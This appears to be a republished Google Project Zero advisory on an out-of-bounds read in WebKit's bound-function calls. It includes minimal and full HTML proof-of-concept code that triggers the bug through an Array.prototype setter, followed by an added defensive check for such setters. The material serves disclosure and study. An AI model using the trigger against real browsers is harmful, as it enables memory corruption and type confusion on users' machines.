Apple Safari - Out-of-Bounds Read when Calling Bound Function
Source: Google Security Research  Author: Google  Published: 2017-03-28
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1033
 
There is an out-of-bounds read when reading the bound arguments array of a bound function. When Function.bind is called, the arguments to the call are transferred to an Array before they are passed to JSBoundFunction::JSBoundFunction. Because a setter may have been added to the Array prototype, user script can obtain a reference to this Array and alter it so that its length is larger than the backing native butterfly array. When boundFunctionCall later copies this array into the call parameters, it assumes the length does not exceed the allocated array (which would hold if the array had not been altered), and reads out of bounds.
 
This is likely exploitable, because the read values are treated as JSValues, so this issue can allow type confusion if the attacker controls any of the unallocated values that are read.
 
This issue is only in WebKit trunk and Safari preview, it hasn't made it to regular Safari releases yet.
 
 
A minimal PoC is as follows, and a full PoC is attached.
 
 
var ba;
 
function s(){
    ba = this;
}
 
 
function dummy(){
    alert("just a function");
}
 
 
Object.defineProperty(Array.prototype, "0", {set : s });
var f = dummy.bind({}, 1, 2, 3, 4);
ba.length = 100000;
f(1, 2, 3);
-->
 
<html>
<body>
<script>
 
var ba;

// Setter installed on Array.prototype["0"]: it fires when the engine stores the
// first bound argument into its freshly created array, leaking that array as `this`.
function s(){
    alert("in s");
    ba = this;
}

// Getter paired with the setter; returns a harmless value when element 0 is read.
function g(){
    alert("in g");
    return 7;
}

function dummy(){
    alert("just a function");
}

alert("start");

try{
    Object.defineProperty(Array.prototype, "0", {set : s, get : g});
    var f = dummy.bind({}, 1, 2, 3, 4);   // the internal bound-arguments array is captured in ba
    alert("ba" + ba);
    ba.length = 100000;                   // length now exceeds the backing butterfly allocation
    f(1, 2, 3);                           // boundFunctionCall copies past the allocation
}catch(e){
    alert(e.message);
}
 
</script>
</body>
</html>
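The root cause above is that an accessor on Array.prototype["0"] intercepts element stores into a holey array, handing the array to script as `this`. The following added example (not part of the Project Zero report) isolates that mechanism in plain JavaScript and pairs it with a small integrity check, `findIndexAccessors` (a name chosen here), that a page can use to report index-like accessors installed on Array.prototype.

```javascript
'use strict';

// Integrity check: list index-like keys on a prototype that carry a getter or
// setter. A clean Array.prototype returns [].
function findIndexAccessors(proto = Array.prototype) {
  return Object.getOwnPropertyNames(proto).filter((key) => {
    if (!/^(0|[1-9]\d*)$/.test(key)) return false;
    const d = Object.getOwnPropertyDescriptor(proto, key);
    return typeof d.get === 'function' || typeof d.set === 'function';
  });
}

// Demonstrate the capture: a store into an array that has no own element "0"
// reaches the prototype setter, which is the path the engine's internal
// bound-arguments array took in the bug. The accessor is installed as
// configurable here so it can be removed again afterwards.
function demonstrateCapture() {
  let captured = null;
  Object.defineProperty(Array.prototype, '0', {
    configurable: true,
    set(v) { captured = this; },   // `this` is the array being written to
    get() { return undefined; },
  });
  try {
    const accessorsSeen = findIndexAccessors();
    const holey = [];
    holey[0] = 'x';                // no own "0" yet -> prototype setter fires
    const literal = ['y'];         // a literal defines its own element directly
    return {
      accessorsSeen,
      capturedIsArray: captured === holey,
      holeyHasOwn0: Object.prototype.hasOwnProperty.call(holey, '0'),
      literalKeptValue: literal[0] === 'y',
    };
  } finally {
    delete Array.prototype['0'];   // restore the prototype
  }
}
```

Running `demonstrateCapture()` shows that the element-wise store never lands on the array itself but in the setter, while an array literal is unaffected; afterwards `findIndexAccessors()` returns an empty list again.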
 